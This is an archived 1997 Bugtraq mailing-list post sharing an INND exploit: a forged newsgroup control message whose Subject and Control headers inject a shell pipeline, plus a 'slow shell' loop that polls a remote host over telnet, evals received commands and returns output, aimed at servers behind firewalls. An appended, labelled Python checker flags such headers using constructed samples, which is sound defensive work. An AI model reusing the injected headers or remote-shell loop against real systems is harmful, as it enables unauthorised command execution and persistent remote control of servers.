Bugtraq mailing list archives

INND exploit Works behind firewalls


From: k97161 () SKYRR IS (Rikhardur Egilsson)
Date: Tue, 18 Mar 1997 09:25:43 +0000


A part of the first innd exploit was a remote shell that would be
effective behind firewalls.

Along with a replaced 'telnetd' on the attacker's computer, this can be
used as a "slow shell" to execute commands on a target behind a firewall.

Enjoy the reading.

#################### START SLOW SHELL #################################
Path: skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale () uunet uu net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request () uunet uu net
Message-ID: <830201540.9020 () uunet uu net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while:; do
  IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
  if [ X"$IN" != X"$OIN" ]; then
    (/bin/sleep 2; eval "$IN" 2>&1) |
      /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
    OIN=$IN
  fi
  sleep 30
done
#-

#################### END SLOW SHELL #################################



--
rikardur () skyrr is   -     Skyrr Ltd     -  Iceland Information Management
Rikhardur Egilsson  - System Programmer -  UNIX Admin - Tel : +354-5695100
Armuli 2  -  IS-108 Reykjavik -   Iceland  -  Fax : +354-5695251
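
A defensive check for the header shape shown in this post, where a backtick-quoted pipeline sits in the Control: and Subject: lines where a newsgroup name belongs. This is an added example, not part of the original post and not INN's own code; the allowlist pattern, the function names and the sample articles are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Assumption: conservative allowlist for a newsgroup name (dot-separated
# components of lowercase letters, digits, '+', '-', '_').
GROUP_RE = re.compile(r"^[a-z0-9+_-]+(\.[a-z0-9+_-]+)*$")
# Characters a shell acts on if a header value is ever expanded unquoted.
SHELL_META = set("`$|;&<>(){}'\"\\*?")

def control_fields(article):
    """Return the control command split into words, or None if not a control message."""
    msg = message_from_string(article)
    value = msg.get("Control")
    if value is None:
        subject = msg.get("Subject", "")
        if subject.startswith("cmsg "):   # Subject-line form, also seen in the post
            value = subject[len("cmsg "):]
    return value.split() if value is not None else None

def audit_control(article):
    """Return reasons to quarantine the article; an empty list means none found."""
    fields = control_fields(article)
    if fields is None:
        return []
    reasons = []
    found = sorted(SHELL_META.intersection(" ".join(fields)))
    if found:
        reasons.append("shell metacharacters in control header: " + " ".join(found))
    if fields and fields[0] in ("newgroup", "rmgroup"):
        if len(fields) < 2 or not GROUP_RE.match(fields[1]):
            reasons.append("group argument is not a plain newsgroup name")
    return reasons

# Constructed sample articles (not captured traffic).
BENIGN = ("From: admin@example.org\n"
          "Control: newgroup comp.lang.example moderated\n\nbody\n")
SUSPECT = ("From: admin@example.org\n"
           "Subject: cmsg newgroup `/bin/true` moderated\n"
           "Control: newgroup `/bin/true` moderated\n\nbody\n")
SUBJECT_ONLY = ("From: admin@example.org\n"
                "Subject: cmsg rmgroup misc.test:x\n\nbody\n")

if __name__ == "__main__":
    for name, art in (("benign", BENIGN), ("suspect", SUSPECT), ("subject-only", SUBJECT_ONLY)):
        print(name, audit_control(art))
```

The allowlist also rejects the colon-separated argument form, which contains no character from the metacharacter set.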


